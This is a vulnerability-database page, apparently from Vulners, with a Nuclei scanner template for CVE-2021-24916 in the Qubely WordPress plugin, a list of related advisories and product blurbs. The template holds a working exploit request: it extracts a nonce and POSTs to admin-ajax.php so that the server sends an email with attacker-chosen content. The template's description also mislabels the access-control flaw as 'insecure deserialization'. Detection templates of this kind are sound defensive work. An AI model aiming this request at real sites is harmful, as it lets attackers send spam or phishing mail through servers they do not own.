| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| CVE-2021-24916 | 7 Aug 202318:14 | – | circl | |
| WordPress plugin Qubely security vulnerability | 7 Aug 202300:00 | – | cnnvd | |
| CVE-2021-24916 | 7 Aug 202314:31 | – | cve | |
| CVE-2021-24916 Qubely < 1.8.6 - Unauthenticated Arbitrary E-mail Sending | 7 Aug 202314:31 | – | cvelist | |
| EUVD-2021-11828 | 7 Oct 202500:30 | – | euvd | |
| CVE-2021-24916 | 7 Aug 202315:15 | – | nvd | |
| CVE-2021-24916 | 7 Aug 202315:15 | – | osv | |
| WordPress Qubely – Advanced Gutenberg Blocks Plugin < 1.8.6 is vulnerable to Broken Access Control | 8 Aug 202300:00 | – | patchstack | |
| Design/Logic Flaw | 7 Aug 202315:15 | – | prion | |
| PT-2023-12071 | 7 Aug 202300:00 | – | ptsecurity |
id: CVE-2021-24916
info:
name: WordPress Qubely < 1.8.6 - Unauthenticated Email Sending
author: roberto
severity: high
description: |
Qubely WordPress plugin < 1.8.6 contains an insecure deserialization caused by unauthenticated users being able to send arbitrary emails via the qubely_send_form_data AJAX action, letting attackers send spam or malicious emails, exploit requires no authentication.
impact: |
Attackers can send spam or malicious emails from the server, potentially leading to spam blacklisting or abuse.
remediation: |
Update to version 1.8.6 or later
reference:
- https://wpscan.com/vulnerability/93b893be-59ad-4500-8edb-9fa7a45304d5/
- https://nvd.nist.gov/vuln/detail/CVE-2021-24916
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
cvss-score: 5.3
cve-id: CVE-2021-24916
epss-score: 0.01535
epss-percentile: 0.71795
cwe-id: CWE-284
metadata:
max-request: 3
verified: true
vendor: themeum
product: qubely
fofa-query: body="qubely_urls"
publicwww-query: "/wp-content/plugins/qubely/"
tags: cve,cve2021,wordpress,wp-plugin,qubely,wp,email,unauth
flow: http(1) && http(2) && http(3)
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/qubely/readme.txt"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "Qubely")'
- 'compare_versions(version, "< 1.8.6")'
internal: true
condition: and
extractors:
- type: regex
name: version
internal: true
group: 1
regex:
- '(?m)Stable tag:\s*([\d.]+)'
- method: GET
path:
- "{{BaseURL}}/"
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "qubely_urls", "\"nonce\"")'
internal: true
condition: and
extractors:
- type: regex
name: nonce
internal: true
group: 1
regex:
- '"nonce":"([a-f0-9]+)"'
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=qubely_send_form_data&[email protected]&email-subject=CVE-2021-24916+Test&email-body=test&field-error-message=err&form-success-message=qubely49fc16d8&form-error-message=qubely49fc16d8&qubely-form-input[name]=test&security={{nonce}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "\"success\":true", "qubely49fc16d8")'
condition: and
# digest: 490a00463044022040e56c4797a7d878fca5c51db2508d9e5d0e3a3f6373d6751a4faade7f01f2a802207beda317d7e70640ac25e4dfd9d85e534fba0e1f02c6eb9e2bf408ff47f9d271:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation